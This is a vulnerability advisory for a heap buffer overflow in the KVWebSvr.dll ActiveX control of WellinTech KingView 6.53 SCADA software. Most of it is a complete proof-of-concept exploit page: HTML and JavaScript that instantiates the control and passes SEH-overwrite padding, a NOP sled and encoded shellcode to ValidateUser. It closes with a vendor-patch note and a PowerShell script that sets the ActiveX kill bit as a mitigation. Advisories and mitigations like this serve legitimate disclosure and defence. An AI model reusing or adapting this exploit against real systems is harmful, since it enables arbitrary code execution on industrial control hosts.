WellinTech KingView "KVWebSvr.dll" ActiveX Control Heap Buffer Overflow Vulnerability

Affected systems:

Wellintech KingView 6.53

Description:
KingView is WellinTech's first SCADA product aimed at small and medium-sized projects; it is used to monitor and control automation equipment and processes.

The WellinTech KingView ActiveX control contains a heap buffer overflow in its implementation. An attacker can exploit this vulnerability to execute arbitrary code in an application that hosts the ActiveX control (Internet Explorer in particular), or to cause a denial of service.

<*Source: Carlos Mario Penagos Hollmann
  *>

Test method:

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk! Carlos Mario Penagos Hollmann () provided the following test method:

# Exploit Title: KingView 6.5.3 SCADA ActiveX
# Date: March 07  2011
# Author: Carlos Mario Penagos Hollmann
# Software Link:
http://download.kingview.com/software/kingview%20English%20Version/kingview6.53_EN.rar
# Version: 6.53 (English)
# Tested on: Windows xp sp3  running on VMware Fusion 3.1 and VirtualBox 3.2.8

Thanks to Dillon Beresford for Heap Exploit
<html>
mail—-> shogilord^gmail.com spams are welcome!!!!!
    ________  _    _________   ____ __ _____   ________
   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __
/ /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /
/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/
    
COLOMBIA hacking presents………….
Beijing WellinControl Technology Development Co.,Ltd FIX your KVWebSvr.dll

<object classid='clsid:F31C42E3-CBF9-4E5C-BB95-521B4E85060D' id='target' /></object>
<script language='javascript'>
nse="\xEB\x06\x90\x90";
seh="\x4E\x20\xD1\x72";
nops="\x90";
while (nops.length<10){ nops+="\x90";}
/*Calc.exe alpha_upper badchars –> "\x8b\x93\x83\x8a\x8c\x8d\x8f\x8e\x87\x81\x84\x86\x88\x89\x90\x91\x92\x94\x95\x96\x97\x98\x99\x82\x85\x9f\x9a\x9e\x9d\x9b\x9f\x76*/
shell="\x54\x5f\xda\xdf\xd9\x77\xf4\x5e\x56\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4c\x4b\x5a\x4c\x50\x55\x4c\x4b\x5a\x4c\x43\x58\x51\x30\x51\x30\x51\x30\x56\x4f\x52\x48\x52\x43\x45\x31\x52\x4c\x43\x53\x4c\x4d\x51\x55\x5a\x58\x56\x30\x58\x38\x49\x57\x4d\x43\x49\x52\x54\x37\x4b\x4f\x58\x50\x41\x41";
junk1="A";
junk2="A";
while (junk1.length<624){ junk1+=junk1;}
junk1=junk1.substring(0,624);
junk2=junk1;
while (junk2.length<8073){ junk2+=junk2;}
arg2=junk1+nse+seh+nops+shell+junk2;
arg1="Anything";
target.ValidateUser(arg1 ,arg2);

</script>

Recommendation:

Vendor patch:

Wellintech
———-
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's homepage for the latest version:

http://www.kingview.com/products/detail.aspx?contentid=24
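Until a vendor fix is available, the usual interim mitigation for a vulnerable ActiveX control is to set its kill bit so Internet Explorer refuses to instantiate it. The script below is an added example, not part of the original advisory and not vendor guidance; it assumes the CLSID from the proof of concept above (F31C42E3-CBF9-4E5C-BB95-521B4E85060D) identifies the KVWebSvr.dll control, and that blocking the control in the browser is acceptable for the affected hosts.

```powershell
# Added mitigation example (not from the advisory): set the ActiveX kill bit
# for the KVWebSvr.dll control so Internet Explorer will not load it.
# Run from an elevated PowerShell session.

# CLSID taken from the proof-of-concept <object> tag above.
$Clsid = '{F31C42E3-CBF9-4E5C-BB95-521B4E85060D}'

# 0x400 in "Compatibility Flags" is the kill bit that IE honours.
$KillBit = 0x400

# On 64-bit Windows, 32-bit IE reads the Wow6432Node view, so set both.
$Paths = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
)

function Set-ActiveXKillBit {
    param([string]$Path)
    if (-not (Test-Path $Path)) {
        New-Item -Path $Path -Force | Out-Null
    }
    # Preserve any existing flags and OR in the kill bit.
    $existing = 0
    $prop = Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($prop) { $existing = [int]$prop.'Compatibility Flags' }
    $value = $existing -bor $KillBit
    New-ItemProperty -Path $Path -Name 'Compatibility Flags' -Value $value `
        -PropertyType DWord -Force | Out-Null
}

function Test-ActiveXKillBit {
    param([string]$Path)
    $prop = Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if (-not $prop) { return $false }
    return (([int]$prop.'Compatibility Flags') -band $KillBit) -eq $KillBit
}

foreach ($p in $Paths) {
    # Skip the Wow6432Node hive on 32-bit Windows where it does not exist.
    if ($p -like '*Wow6432Node*' -and -not [Environment]::Is64BitOperatingSystem) { continue }
    Set-ActiveXKillBit -Path $p
    $ok = Test-ActiveXKillBit -Path $p
    Write-Output ("{0}: kill bit set = {1}" -f $p, $ok)
}
```

The kill bit only stops Internet Explorer (and other hosts that honour the ActiveX Compatibility key) from instantiating the control; it does not repair KVWebSvr.dll itself, so the vendor update should still be applied when it becomes available. The same check can be run across a fleet to confirm the mitigation is in place on every host that has KingView 6.53 installed.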
